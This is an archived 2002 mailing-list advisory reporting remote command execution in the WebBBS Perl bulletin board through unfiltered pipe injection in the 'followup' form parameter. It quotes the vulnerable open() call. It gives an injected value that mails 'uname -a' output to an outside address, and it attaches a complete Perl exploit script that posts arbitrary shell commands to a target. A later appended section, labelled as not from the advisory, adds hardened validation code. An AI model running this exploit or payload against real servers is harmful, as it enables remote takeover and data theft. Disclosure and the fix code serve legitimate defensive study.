WebBBS 5.0 (and later versions) vulnerable: allow commands execution via "followup" bug

From: nerf gr0up nerf (vipersvat_private)
Date: Tue Jun 18 2002 - 11:39:58 PDT


    --== Nerf gr0up: adv #7 ==--
    WebBBS remote command execution
    
    Vulnerable:
    WebBBS by Darryl Burgdorf (http://awsd.com/scripts/webbbs/).
    All versions are vulnerable.
    WebBBS is a Web-based bulletin board. WebBBS stores 
    messages as simple text files.
    
    Description:
    WebBBS script allows command execution on server.
    This script does no filtering and due to this
    remote command execution is possible.
    
    The vulnerable code is shown below:
    -----
    webbbs_post.pl:

    ...
    if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; }
    ...
    if ($followup) {
    ...
        $subdir = "bbs".int($followup/1000);
        open (FOLLOWUP,"$dir/$subdir/$followup");
    ...
    -----
    
    Just change the value of the $followup variable, e.g.
    "followup=10" to
    "followup=10;uname -a|mail zloat_private|", to exploit
    this vulnerability.
    
    btr
    nerf
    www.nerf.ru
    
    Attach (exploit in perl):

    #!/usr/bin/perl
    #
    #  nerF gr0up
    #
    #  exploit code for
    #  WebBBS by Darryl C. Burgdorf
    #  all versions up to 5.00 are vulnerable
    #
    #  this is an exploitation of the "followup" bug.
    #  it allows a remote attacker to execute shell commands.
    #  you can find the WebBBS script at http://awsd.com/scripts/webbbs/
    #
    #  06.06.2002
    #  btr // nerf
    #  nerf.ru

    use IO::Socket;

    srand();
    $script  = "/cgi-bin/webbbs/webbbs_config.pl";
    $command = "uname -a|mail zloat_private";
    $host    = "localhost";
    $port    = 80;

    # optional command-line overrides: <command> <host> <script path>
    # (read before the request body is built so that they take effect)
    if ($ARGV[0]) { $command = $ARGV[0]; }
    if ($ARGV[1]) { $host    = $ARGV[1]; }
    if ($ARGV[2]) { $script  = $ARGV[2]; }

    # random filler for the mandatory form fields
    $content  = "name="      . rand(254);
    $content .= "&email="    . rand(254);
    $content .= "&subject="  . rand(254);
    $content .= "&body="     . rand(254);
    # the injected value: a pipe appended to the "followup" parameter
    $content .= "&followup=" . rand(254) . "|$command|";

    $content_length = length($content);
    $content_type   = "application/x-www-form-urlencoded";

    $buf  = "POST $script?post HTTP/1.0\n";
    $buf .= "Content-Type: $content_type\r\nContent-Length:";
    $buf .= "$content_length\r\n\r\n$content";

    print "\tnerF gr0up\n";
    print "exploit: WebBBS (awsd.com), version up to 5.00\n";
    print "sent:\n$buf\n";

    if ($socket = IO::Socket::INET->new("$host:$port")) {
        print $socket "$buf";
        read($socket, $buf, 1500);
        print "received:\n$buf\n";
    }
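    As an added, defender-side example that is not part of the advisory or of WebBBS itself: a hardened replacement for the open() in webbbs_post.pl quoted above, showing why the 2-argument open() is the root cause and how input validation plus the 3-argument form closes it. The function names and the message directory path are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hardened handling of the "followup" parameter (added example, not WebBBS code).
# The advisory's 2-argument open() lets a trailing "|" in the filename turn the
# value into a command pipeline. Two changes close that: accept only a plain
# message number, and use the 3-argument open() so the name is never parsed.

sub followup_path {
    my ($dir, $followup) = @_;
    # Only a decimal message number is acceptable; the capture also untaints
    # the value when the script runs under perl -T.
    return undef unless defined $followup && $followup =~ /^([0-9]{1,9})$/;
    my $num    = $1;
    my $subdir = "bbs" . int($num / 1000);   # same directory layout as the original
    return "$dir/$subdir/$num";
}

sub read_followup {
    my ($dir, $followup) = @_;
    my $path = followup_path($dir, $followup);
    return undef unless defined $path;
    # Explicit read mode: $path is taken literally, with no pipe or
    # redirection interpretation.
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $text = <$fh>;
    close $fh;
    return $text;
}

# Constructed inputs: one legitimate message number and three values shaped
# like the injection in the advisory. The data directory is a placeholder.
my $dir = '/var/www/webbbs/messages';
for my $v ('10', '10|', '10;uname -a|', '../../etc/passwd') {
    my $p = followup_path($dir, $v);
    printf "%-22s => %s\n", "'$v'", defined $p ? $p : 'rejected';
}
```

    Only '10' yields a path; every other value is rejected before any filesystem or shell interaction, which is the check the original script lacked.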
    



    This archive was generated by hypermail 2b30 : Tue Jun 18 2002 - 15:19:32 PDT